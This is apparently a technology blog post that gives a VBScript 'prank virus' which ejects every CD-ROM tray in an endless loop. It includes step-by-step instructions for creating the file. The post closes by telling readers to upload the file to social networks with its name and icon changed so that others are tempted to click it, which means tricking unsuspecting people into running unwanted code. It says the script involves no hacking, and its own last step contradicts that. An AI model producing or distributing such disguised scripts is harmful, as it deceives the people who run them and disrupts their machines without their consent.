It's More than a Technology blog...

Liked us?

Pin It

Computer CD-ROM Hacking 4 Pranking


Hey all of you how are you wanna prank with your friends and check out their dramatic facial expression. This below post will help you in creating a virus file which when activated will open and close your computers
CD-Rom in a loop mode, means again and again making your friend think that his or her computer is hacked. But this is just for FUN and this does not deal with any kind of Hacking Activity, seriously just for FUN.
Computer CD-ROM Hacking 4 Pranking

Procedure to Create Opening and Closing Script .:

1. Open Notepad ( Search it in start menu )
2. Now simply copy and paste the below script into the notepad.

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If

3. Now just save this file as HU.vbs ( Remember the .vbs is really important so do put it and you can pit any name instead of HU )
4. So now just enjoy sharing this file by uploading it to social networks website, now remember to change its name and icon to something more exciting to click.

Twitter Delicious Facebook Digg Stumbleupon Favorites More